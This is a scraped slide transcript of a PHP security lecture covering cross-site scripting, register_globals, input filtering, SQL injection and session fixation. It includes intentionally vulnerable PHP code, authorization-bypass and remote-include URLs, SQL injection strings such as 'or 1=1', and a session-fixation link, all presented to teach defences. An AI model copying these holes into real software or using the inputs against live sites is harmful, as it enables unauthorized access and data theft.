1 / 19

PHP Security

PHP Security. Computer Security. overview. Xss , Css Register_globals Data Filtering Sql Injection Session Fixation. Cross Site Scripting.

lan
Download Presentation

PHP Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. PHP Security Computer Security

  2. overview • Xss , Css • Register_globals • Data Filtering • Sql Injection • Session Fixation

  3. Cross Site Scripting The goal of the CSS attack is to steal the client cookies, or any other sensitive information,which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user. (attention to the sample)

  4. Another sample

  5. Another sample (cont)

  6. Prevent

  7. <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include“Access.php”; } ?> Register_globals Poor Security Login.php RisK Login.php?authorized=1

  8. Register_globals Poor Security Run.php <?php include "$path/script.php"; ?> RisK Run.php?path=http%3A%2F%2Fwww.mysite.com%2F%3F <?php include 'http://www.mysite.com/?/script.php'; ?> If allow_url_fopen is enabled (which it is by default, even in php.ini recommended), this will include the output of http://www.mysite.com/just as if it were a local file

  9. Data Filtering Filtering Examples The following validates an email address: <?php $clean = array(); $email_pattern ='/^[^@\s]+@([-a-z0-9]+\.)+[a-z]{2,}$/i'; if (preg_match($email_pattern, $_POST['email'])) { $clean['email'] = $_POST['email']; } ?>

  10. Data Filtering Filtering Examples The following example ensures that $_POST['num'] is an integer: <?php $clean = array(); if ($_POST['num'] == strval(intval($_POST['num']))) { $clean['num'] = $_POST['num']; } ?> The following example ensures that $_POST['num'] is a float: <?php $clean = array(); if ($_POST['num']==strval(floatval($_POST['num']))) { $clean['num'] = $_POST['num']; } ?>

  11. Databases and SQL Input The User_name and Password in file Outside Webroot folder:Test/conn SetEnv DB_USER " myuser" SetEnv DB_PASS “1234“ SetEnv DB_HOST“myhost” Include this file within httpd.conf as follows: Include “Test/conn" <?php //db.inc $db =mysql_connect($_SERVER['DB_HOST'],$_SERVER['DB_USER'],$_SERVER['DB_PASS']); ?> Be careful not to expose these variables with something like phpinfo() or print_r($_SERVER).

  12. SQL Injection WHERE Hacking <?php //if(isset($_POST['submit'])) { $db = mysql_connect("localhost", "Hawk","3"); mysql_select_db("user",$db); //echo $db; // echo $_POST['user']; $sql="select * from user where UserName='".$_POST['user']."'"."'and Pass='".$_POST['pass']."'"; //echo $sql; $result=mysql_query($sql); while($row=mysql_fetch_array($result)){ echo "<h4> Name: " . $row["UserName"] . ', ' . $row["Pass"] . "</h4> \n"; } mysql_close(); // } // else //echo "Nothing"; ?>

  13. SQL Injection $sql="select * from user where UserName='".$_POST['user']."'"."‘ and Pass='".$_POST['pass']."'"; Select * from user where UserName=ymand Pass=2 or 1=1

  14. select * from user where UserName='ym'and Pass='ym' Injected Select select * from user where UserName='ym‘ ;--and Pass=‘'

  15. Prevent • Using Store Procedures • ctype_alnum — Check for alphanumeric character(s) • ctype_alpha — Check for alphabetic character(s) • mysql_real_escape_string — Escapes special characters in a string for use in a SQL statement

  16. Session Fixation There are three common methods used to obtain by an attacker to valid session identifier: 1. Prediction Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation. 2. Capture Capturing a valid session identifier is the most common type of session attack,and there are numerous approaches. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. Thus, for those users who enable cookies, you can provide them with a more secure mechanism. 3. Fixation In the simplest case, a session fixation attack can use a link: <a href="http://host/index.php?PHPSESSID=1234">Click here </a> Or a protocol-level redirect: <?php header(‘Location: http://host/index.php?PHPSESSID=1234’);?>

  17. Session Fixation

  18. Session Fixation <?php session_start(); if (!isset($_SESSION['visits'])) { $_SESSION['visits'] = 1; } else { $_SESSION['visits']++; } echo$_SESSION['visits']; ?>

  19. Be whatever You are

More Related